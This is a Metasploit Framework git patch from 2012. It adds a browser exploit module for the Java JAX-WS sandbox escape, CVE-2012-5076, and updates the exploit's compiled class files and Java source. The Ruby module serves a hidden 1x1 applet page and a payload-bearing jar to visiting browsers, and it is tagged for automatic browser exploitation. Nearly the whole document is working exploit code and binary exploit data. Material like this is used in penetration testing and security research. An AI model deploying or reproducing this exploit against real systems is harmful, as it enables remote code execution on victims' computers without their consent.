From 5076198ba200a43d8ef6e7b0512732549a7a7add Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sun, 11 Nov 2012 20:18:19 +0100
Subject: [PATCH] fixing bperry comments

---
 data/exploits/cve-2012-5076/Exploit.class     | Bin 2295 -> 2213 bytes
 data/exploits/cve-2012-5076/MyPayload.class   | Bin 883 -> 706 bytes
 .../exploits/cve-2012-5076/Exploit.java       |   3 -
 .../windows/browser/java_jre17_jaxws.rb       | 119 ++++++++++++++++++
 4 files changed, 119 insertions(+), 3 deletions(-)
 create mode 100644 modules/exploits/windows/browser/java_jre17_jaxws.rb

diff --git a/data/exploits/cve-2012-5076/Exploit.class b/data/exploits/cve-2012-5076/Exploit.class
index a0ac39df1bdc4c63ede3e81f31ef3277a74da001..34c26a171cd56d6caba88dd34e067abd770efdc9 100755
GIT binary patch
delta 1225
zcmZ9M+f!Rr6vlr$w-b)1B?-44ODMEy%OwU&OKSsCg@U3$tEphDmxd4^7;-R#3f@v3
zpM2}&!M8qiba19R)5}a?M5-^2Grsg+a2#Lt)i>+fiB!j#Gi$HC*4k@*`&(<DKZ9Qe
zOF#eh?R_A|CnhbNGUzurZQ|mLiJPZPBAhjeGoZzw$<quOoHH@C+2$EP&+3E2CL^5J
z=20!i44$jw2+#W&H)Van&x-~VCLtybru2Hj&&4`QM|jE4%O(jfnY_ZZPBvrmDoKOa
z3@#hIu4qo@Qmd<xrPS3_B$vuBL@vxOWzt1Oa6;R9wXJtV#|$Xy5*zvAVy2i)D~wd3
zklKh0D}005e6~2GaCdf1D?B64Tt-oUeYZd8(H@DY6;T{5KkyzZ?WHpl&RQXz8O!D*
z-WpwB$vN3#OqaEIgA<DO|3R2?iet`Ner|L<omnYnoxGy$-;gP%n)rNXz7|v{I0cJ0
zdCQ`UD_V3LNb0~WX^S~B2J;pRESAUB;b@j60X?~KF}0C%Qgg8?WQ(`S87y1maV%DN
z$D+V$`EzwTY;lxhihu?X(=^3u)LA^qiSjRMV5$qbd(~f~anHZTRpC-ssRFj>)QMb|
zhYjAfSZBlFJ&X7Gz~VzbGALPG<Kyy8*BRTGcM4OfW#P+Q$P_0ttE;I6*)(>RJKRmp
zO`ZQ~TB2CU<`)LKrpv#(ers%~@|1OY$MY*|Me$`)%l96*e^ljN-(bmwU*87BahX_T
zCy*ZPJfaDCB74NwA*+(r+r5SFjwp(#NIlrlfQLr0JRxIW3!la(HhBg;6%23gJO8A6
zC>*_ileTEM#~WVMU+GE(e;}|;-StbKy4B{xU!%7lC2qzm`T^?XO$0e8xNIrdCh2?k
zFexvF_~Dx!%;Xl2O$6JKO5GK#(7p=$;~v`+tx%sFy1~Als5@LCu=(&0ffStFAyi7<
zrQs*)Lyg-sCGXL&iBBw{X7?^FTO5dcZLg?yg~#JQ+o!W0^oT3zzDuh<7p|Rat)6R5
zY||DuY{T|Rkezf#6BQ2qKug?j`zy51sBJnn@l4#2JHS`mDsfm;&EgRCB9BP}j<a9r
zwuQ-va2b=KI!PZhB4;_pXY_M}vwXpzBpBuv=lELw6Mj8>(h1$DKKaY&o`kx$QMV^{
ha3|%$o-MrJR||WDSXZ^KjWkJP>HDYuN;JfI@^AC$^wj_W

delta 1217
zcmZXU-BTN76vlsVHpv^dOBx7m32hKMq7(wOVkr%jRw~tMQlmj@tRLM%3TZ=#kW^DY
z;z#|yV)nudXLP3OaBFpDVMII5c;}t}f}^)yc;k#Sif4gp(b=7|XP!OJbDs0=yYJ^s
zzc<x?`0MMNz#t!(+{vKHy&U$!kjW8-HAhVX9vmhaV#FlEsL3(LJova5PH67ajE6X>
zx!<Ib2``)q@qp$*lhZt8@-QinnQq_=k7zO`F$P0CYSI<sF;md22Tgk6ag!%FYw{#H
z%~P6lnx~h3In&vgt=LnS({_2%zEI37{Do4Xvhn(;<{2q<3aY)ei@P+>T0F;j3!4j?
zDT`_H&Tnde;vzGOo#|S}t`+C)>Hevry|`#GOF<MYE^*nS$ecxqdFO<0$obJ1bsXPF
zy^FHN^DHPDJmN`@r|_K{*9gBtRddDS1zxnMaaHq@#ml^+*mKFgVh<GU(#$}%vQQ|^
zj8_ZA>AdJfviYg%LZMPi+a-G@zmT+emAb`iyzXUhSiH$K&07|4^G-<fuEl%2@9Z;<
zv_v;V3-be~OXX@sbo2I{^P%zcS4;ly)kx&FmbJx7eokS`S1XELsaw2^IN9QjD1vsm
zoG(o)`kaivE%kr1Qqw$>ul&cbBHn#qQ*x8CeI6n8bvxleduH3<0*5N|n~<VqyTZl_
zNyR?{-ey#x%bx9G$*CJ{&SY@34h9PO;1chaE!-(jCC@<53hIU=if)M}K8aEMv<Py5
z9*JK0EJ4Abzt_bVD1H-48)Nar&Fi!$;=O_RtaqPxF(Q#w{7aM947I%eQ{oF@_%?Lw
zyJho3D-E(~o7gKpVkBs%S5OPzpX|`Is6XhChKXA))tIzxkc!XN2;^1>rkXmC-aRh5
zIpori^vC=O7c)2ZF^#<mBkr<edHq*0X{Fa_%tZ+|?=-$8QeUAd8HfcW54$ucgR!8e
z5%tTvoDroZyUMPlj_FuXpm5GeWL<WDM<f}FNuxbyzod1In0RPw-s`e&6=~J(a)(QY
zTBUOtf9i%<hflc9{;jFU<u^uFF+{yb&V+uM`JkK|ha?-6>o5}xk&&b0BEwu|R5tW6
zKH|8DOo+@lpK@wrg@*C33pt?a)AY+qp&5X6N&dyu7Pg3FeO@@|ebz%_!RO<izX8E&
B`y&7V

diff --git a/data/exploits/cve-2012-5076/MyPayload.class b/data/exploits/cve-2012-5076/MyPayload.class
index a0ea9dd2e50ce2763ca0e8dcc44616a8e87b68d3..63c2cbc595a86b9d6efbda1316d862d1b8c9d98c 100755
GIT binary patch
delta 261
zcmYLDOAY}+5PikyHf?-oFylWy8xac!a3~jWhK@C7AU0xQVJU87FJ2Fc?xgBf)qAh%
zrS65<<9)pWSYl$J5E?{iYP1a6h&2+8jz-t6=5{lep50GNMfe*100Ru|bD>57QjE`$
z#L^=w&_tl=m}e%J(Xd+Y4!LwIC=s{F0%sm8A2kFh^Vi9AD3|fatb{Bj7kF|c`f3g5
k&cWk-6(W!QYUbkqlnJ};$;pLmp*smYIQ%Pw`#?qG1GUE#Gynhq

delta 456
zcmZvXO-=$q5QSe4Fb(5?{EIrEAP9`;D8?06ki-Pyel!Hp5ePvSZaBlli--#~E?gK_
zUcqCySKq+K7}H5r_p5qeSG@*4)%yF_^9z7|)HQ^#tYHPK5{8B>av_GbAl5bHQIOb>
zC`y#vl9>#*#`ft&(;l|%6Q?sP8E&&CHr<<IWC6NFSw{s`f%5G@WZbuyVd~gIO~*EN
z1k|&R;|%f=mX2NQO+PYXBH$ZbjRjJN=k~R2^#<0_sMjC2#-omX*$_zlBMZo(*W~o+
ztIUm#-S1j-_4?gL^_ZgvxtM^)Eq%<Kjxo$vn^|Fwn2!+Vt)V0*3L+HJ2rvfWXLATq
z8p1p=EK-d^`Su8sH-;Dpi6cRfhb-_Vm{suvzqsQ~%!u0Tqcn+2NK*AvPm!G_YVIs~
b9S1Ch?h%Nq50KM8?kp$D{c;PkKv(7m8|Xj6

diff --git a/external/source/exploits/cve-2012-5076/Exploit.java b/external/source/exploits/cve-2012-5076/Exploit.java
index 5129df93f9..1f1cfcc871 100755
--- a/external/source/exploits/cve-2012-5076/Exploit.java
+++ b/external/source/exploits/cve-2012-5076/Exploit.java
@@ -35,9 +35,6 @@ public class Exploit extends Applet
     {
         try
         {
-			// Hex String for MyPayload.class
-            //String my_payload = "cafebabe0000003300350a000a001a0a001b001c07001d0a0003001e0a001f002009001f00210800220a002300240700250700260700270100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c6501000d537461636b4d61705461626c6507002507001d01000372756e01001428294c6a6176612f6c616e672f4f626a6563743b01000a457863657074696f6e730700280100017201000a536f7572636546696c6501000e4d795061796c6f61642e6a6176610c000c000d0700290c002a002b0100276a6176612f73656375726974792f50726976696c65676564416374696f6e457863657074696f6e0c002c000d07002d0c002e002f0c0030003101000668656c6c6f210700320c003300340100094d795061796c6f61640100106a6176612f6c616e672f4f626a6563740100276a6176612f73656375726974792f50726976696c65676564457863657074696f6e416374696f6e0100136a6176612f6c616e672f457863657074696f6e01001e6a6176612f73656375726974792f416363657373436f6e74726f6c6c657201000c646f50726976696c6567656401003d284c6a6176612f73656375726974792f50726976696c65676564457863657074696f6e416374696f6e3b294c6a6176612f6c616e672f4f626a6563743b01000f7072696e74537461636b54726163650100106a6176612f6c616e672f53797374656d01001273657453656375726974794d616e6167657201001e284c6a6176612f6c616e672f53656375726974794d616e616765723b29560100036f75740100154c6a6176612f696f2f5072696e7453747265616d3b0100136a6176612f696f2f5072696e7453747265616d0100077072696e746c6e010015284c6a6176612f6c616e672f537472696e673b295600210009000a0001000b000000030001000c000d0001000e0000005c00010002000000122ab700012ab8000257a700084c2bb60004b1000100040009000c00030002000f0000001a0006000000080004000b00090010000c000d000d000f001100110010000000100002ff000c00010700110001070012040001001300140002000e00000022000100010000000601b8000501b000000001000f0000000a000200000016000400170015000000040001001600090017000d0002000e000000250002000000000009b200061207b60008b100000001000f0000000a00020000001d0008001e0015000000040001001600010018000000020019";            
-			//byte[] byte_payload = hex2Byte(my_payload);
 			ByteArrayOutputStream bos = new ByteArrayOutputStream();
 			byte[] buffer = new byte[8192];
 			int length;
diff --git a/modules/exploits/windows/browser/java_jre17_jaxws.rb b/modules/exploits/windows/browser/java_jre17_jaxws.rb
new file mode 100644
index 0000000000..a5fa995344
--- /dev/null
+++ b/modules/exploits/windows/browser/java_jre17_jaxws.rb
@@ -0,0 +1,119 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+		super( update_info( info,
+			'Name'          => 'Java Applet JAX-WS Remote Code Execution',
+			'Description'   => %q{
+					This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
+				code outside of the sandbox as exploited in the wild in November of 2012. The
+				vulnerability affects Java version 7u7 and earlier.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Unknown', # Vulnerability Discovery
+					'juan vazquez' # metasploit module
+				],
+			'References'    =>
+				[
+					[ 'CVE', '2012-5076' ],
+					[ 'OSVDB', '86363' ],
+					[ 'BID', '56054' ],
+					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
+					[ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ]
+				],
+			'Platform'      => [ 'java', 'win' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					],
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Oct 16 2012'
+			))
+	end
+
+
+	def on_request_uri( cli, request )
+		if not request.uri.match(/\.jar$/i)
+			if not request.uri.match(/\/$/)
+				send_redirect(cli, get_resource() + '/', '')
+				return
+			end
+
+			print_status("#{self.name} handling request")
+
+			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
+			return
+		end
+
+		paths = [
+			[ "Exploit.class" ],
+			[ "MyPayload.class" ]
+		]
+
+		p = regenerate_payload(cli)
+
+		jar  = p.encoded_jar
+
+		paths.each do |path|
+			1.upto(path.length - 1) do |idx|
+				full = path[0,idx].join("/") + "/"
+				if !(jar.entries.map{|e|e.name}.include?(full))
+					jar.add_file(full, '')
+				end
+			end
+			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2012-5076", path ), "rb")
+			data = fd.read(fd.stat.size)
+			jar.add_file(path.join("/"), data)
+			fd.close
+		end
+
+		print_status("Sending Applet.jar")
+		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+
+		handler( cli )
+	end
+
+	def generate_html
+		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
+		html  = "<html><head></head>"
+		html += "<body>"
+		html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
+		html += "</applet></body></html>"
+		return html
+	end
+
+end